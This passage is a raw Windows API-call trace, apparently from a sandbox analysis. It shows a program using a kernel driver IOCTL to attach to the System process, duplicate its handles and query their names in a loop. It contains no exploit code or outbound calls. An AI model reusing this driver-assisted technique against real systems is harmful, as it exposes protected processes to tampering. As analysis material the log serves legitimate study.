ProcessHandle=0xfffff880051635f0, DesiredAccess=0x40, ObjectAttributes=0xfffff88005163608*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff880051635f8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffff880051635f0*=0xffffffff800005a4) returned 0x0 [0116.805] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff800005a4, SourceHandle=0x428, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xfffffa80025f40c0, DesiredAccess=0xfffff88010000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xfffffa80025f40c0*=0xc8) returned 0x0 [0116.805] ZwClose (Handle=0xffffffff800005a4) returned 0x0 [0116.805] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.805] CloseHandle (hObject=0xc4) returned 1 [0116.805] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.805] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2ceb50 [0116.805] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x2ceb50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2ceb50, ReturnLength=0x0) returned 0x0 [0116.805] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2ceb50 | out: hHeap=0x290000) returned 1 [0116.805] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.805] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.805] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.805] PsAcquireProcessExitSynchronization () returned 0x0 [0116.805] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.805] ObReferenceObjectByHandle (in: Handle=0xffffffff80000428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028d63f0, HandleInformation=0x0) returned 0x0 [0116.805] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.805] PsReleaseProcessExitSynchronization () returned 0x2 [0116.805] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.805] ObQueryNameString (in: Object=0xfffffa80028d63f0, ObjectNameInfo=0xfffffa800280c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800280c044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.805] ObfDereferenceObject (Object=0xfffffa80028d63f0) returned 0x3 [0116.805] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.805] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.805] CloseHandle (hObject=0xc8) returned 1 [0116.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0116.806] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.806] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.806] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.806] PsAcquireProcessExitSynchronization () returned 0x0 [0116.806] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.806] ObReferenceObjectByHandle (in: Handle=0xffffffff80000044, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80071ff050, HandleInformation=0x0) returned 0x0 [0116.806] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.806] PsReleaseProcessExitSynchronization () returned 0x2 [0116.806] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.806] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800280e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800280e044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.806] ObfDereferenceObject (Object=0xfffffa80071ff050) returned 0x1 [0116.806] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.806] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.806] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.806] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.806] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.806] PsAcquireProcessExitSynchronization () returned 0x0 [0116.806] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.806] ObReferenceObjectByHandle (in: Handle=0xffffffff8000004c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8006c4d050, HandleInformation=0x0) returned 0x0 [0116.806] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.806] PsReleaseProcessExitSynchronization () returned 0x2 [0116.806] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.807] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002816044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002816044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.807] ObfDereferenceObject (Object=0xfffffa8006c4d050) returned 0x1 [0116.807] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.807] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.807] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.807] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.807] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.807] PsAcquireProcessExitSynchronization () returned 0x0 [0116.807] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.807] ObReferenceObjectByHandle (in: Handle=0xffffffff80000050, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80071c6f20, HandleInformation=0x0) returned 0x0 [0116.807] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.807] PsReleaseProcessExitSynchronization () returned 0x2 [0116.807] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.807] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800281a044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800281a044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.807] ObfDereferenceObject (Object=0xfffffa80071c6f20) returned 0x1 [0116.807] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.807] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.807] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.807] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.807] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.807] PsAcquireProcessExitSynchronization () returned 0x0 [0116.807] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.807] ObReferenceObjectByHandle (in: Handle=0xffffffff80000054, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8005df9050, HandleInformation=0x0) returned 0x0 [0116.807] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.807] PsReleaseProcessExitSynchronization () returned 0x2 [0116.807] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.807] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800281b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800281b044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.807] ObfDereferenceObject (Object=0xfffffa8005df9050) returned 0x1 [0116.807] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.808] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.808] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.808] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.808] PsAcquireProcessExitSynchronization () returned 0x0 [0116.808] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.808] ObReferenceObjectByHandle (in: Handle=0xffffffff80000058, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8005dff050, HandleInformation=0x0) returned 0x0 [0116.808] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.808] PsReleaseProcessExitSynchronization () returned 0x2 [0116.808] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.808] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800281c044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800281c044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.808] ObfDereferenceObject (Object=0xfffffa8005dff050) returned 0x1 [0116.808] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.808] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.808] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.808] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.808] PsAcquireProcessExitSynchronization () returned 0x0 [0116.808] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.808] ObReferenceObjectByHandle (in: Handle=0xffffffff8000005c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80059fd1f0, HandleInformation=0x0) returned 0x0 [0116.808] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.808] PsReleaseProcessExitSynchronization () returned 0x2 [0116.808] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.808] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800281d044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800281d044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.808] ObfDereferenceObject (Object=0xfffffa80059fd1f0) returned 0x1 [0116.808] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.808] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.808] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.809] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.809] PsAcquireProcessExitSynchronization () returned 0x0 [0116.809] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.809] ObReferenceObjectByHandle (in: Handle=0xffffffff80000060, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80053b7050, HandleInformation=0x0) returned 0x0 [0116.809] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.809] PsReleaseProcessExitSynchronization () returned 0x2 [0116.809] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.809] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800281f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800281f044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.809] ObfDereferenceObject (Object=0xfffffa80053b7050) returned 0x1 [0116.809] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.809] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.809] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.809] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.809] PsAcquireProcessExitSynchronization () returned 0x0 [0116.809] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.809] ObReferenceObjectByHandle (in: Handle=0xffffffff80000064, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80029f3850, HandleInformation=0x0) returned 0x0 [0116.809] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.809] PsReleaseProcessExitSynchronization () returned 0x2 [0116.809] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.809] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800282e044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800282e044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.809] ObfDereferenceObject (Object=0xfffffa80029f3850) returned 0x1 [0116.809] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.809] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.809] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.810] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.810] PsAcquireProcessExitSynchronization () returned 0x0 [0116.810] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.810] ObReferenceObjectByHandle (in: Handle=0xffffffff80000068, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8004bdf050, HandleInformation=0x0) returned 0x0 [0116.810] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.810] PsReleaseProcessExitSynchronization () returned 0x2 [0116.810] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.810] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002836044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002836044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.810] ObfDereferenceObject (Object=0xfffffa8004bdf050) returned 0x1 [0116.810] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.810] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.810] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.810] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.810] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.810] PsAcquireProcessExitSynchronization () returned 0x0 [0116.810] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.810] ObReferenceObjectByHandle (in: Handle=0xffffffff8000006c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003e71050, HandleInformation=0x0) returned 0x0 [0116.810] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.810] PsReleaseProcessExitSynchronization () returned 0x2 [0116.810] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.810] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002838044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002838044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.810] ObfDereferenceObject (Object=0xfffffa8003e71050) returned 0x1 [0116.810] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.810] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.810] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.810] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.811] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.811] PsAcquireProcessExitSynchronization () returned 0x0 [0116.811] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.811] ObReferenceObjectByHandle (in: Handle=0xffffffff80000070, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80045a7c90, HandleInformation=0x0) returned 0x0 [0116.811] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.811] PsReleaseProcessExitSynchronization () returned 0x2 [0116.811] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.811] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800283a044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800283a044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.811] ObfDereferenceObject (Object=0xfffffa80045a7c90) returned 0x1 [0116.811] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.811] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.811] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.811] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.811] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.811] PsAcquireProcessExitSynchronization () returned 0x0 [0116.811] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.811] ObReferenceObjectByHandle (in: Handle=0xffffffff80000074, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003d963e0, HandleInformation=0x0) returned 0x0 [0116.811] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.811] PsReleaseProcessExitSynchronization () returned 0x2 [0116.811] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.811] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800283b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800283b044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.811] ObfDereferenceObject (Object=0xfffffa8003d963e0) returned 0x1 [0116.811] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.811] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.811] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.811] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.812] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.812] PsAcquireProcessExitSynchronization () returned 0x0 [0116.812] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.812] ObReferenceObjectByHandle (in: Handle=0xffffffff80000078, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80045a7f20, HandleInformation=0x0) returned 0x0 [0116.812] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.812] PsReleaseProcessExitSynchronization () returned 0x2 [0116.812] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.812] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800283c044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800283c044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.812] ObfDereferenceObject (Object=0xfffffa80045a7f20) returned 0x1 [0116.812] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.812] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.812] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.812] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.812] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.812] PsAcquireProcessExitSynchronization () returned 0x0 [0116.812] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.812] ObReferenceObjectByHandle (in: Handle=0xffffffff8000007c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: 